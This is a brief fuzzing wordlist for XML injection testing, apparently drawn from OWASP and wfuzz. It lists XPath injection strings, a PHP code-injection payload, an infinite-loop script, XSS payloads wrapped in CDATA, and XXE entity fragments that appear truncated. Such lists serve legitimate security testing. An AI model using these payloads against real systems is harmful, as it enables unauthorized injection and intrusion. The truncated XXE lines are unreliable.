Testing for XML Injection

count(/child::node())
x' or name()='username' or 'x'='y
','')); phpinfo(); exit;/*
var n=0;while(true){n++;}]]>
SCRIPT]]>alert('XSS');/SCRIPT]]>
SCRIPT]]>alert('XSS');/SCRIPT]]>

]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;
]]>


XSS



Sources:
https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt